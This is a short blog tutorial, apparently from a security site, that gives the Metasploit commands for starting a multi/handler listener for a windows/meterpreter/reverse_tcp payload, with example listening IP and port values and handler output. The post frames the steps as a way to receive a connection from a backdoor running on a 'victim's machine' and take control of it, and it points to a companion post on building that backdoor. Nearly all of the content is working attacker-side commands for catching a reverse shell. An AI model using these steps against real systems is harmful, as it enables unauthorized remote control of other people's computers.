Starting a handler with Metasploit

You can start a handler with Metasploit at any time, this is useful when you are executing a backdoor in a victim’s machine and you need to connect back to take control. Now we’ll show you the steps you need to start your handler at the same port of your backdoor.

The first step is to open a session in Metasploit with the command:

# msfconsole

Now run the following commands:

msf> use multi/handler

msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf  exploit(handler) > set LHOST <Listening_IP> (for example set LHOST 192.168.5.55)

msf exploit(handler) > set LPORT <Listening_Port> (for example set LPORT 4444)

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[*] Starting the payload handler…

The Listening IP and Port must match the ones of your Backtrack or the machine from which you are using Metasploit.

With these simple steps you’ll be able to execute the backdoor in your victim’s machine and then control it back with Metasploit.

If you want to see how to create your backdoor you can check out our port Creating an executable backdoor with Metasploit.

You can also send us your comments and questions to our Twitter account: @redinskala where you’ll find more info and security tips.

 

 

One thought on “Starting a handler with Metasploit

  1. Pingback: Creating an executable backdoor with Metasploit | RedinSkala

Comments are closed.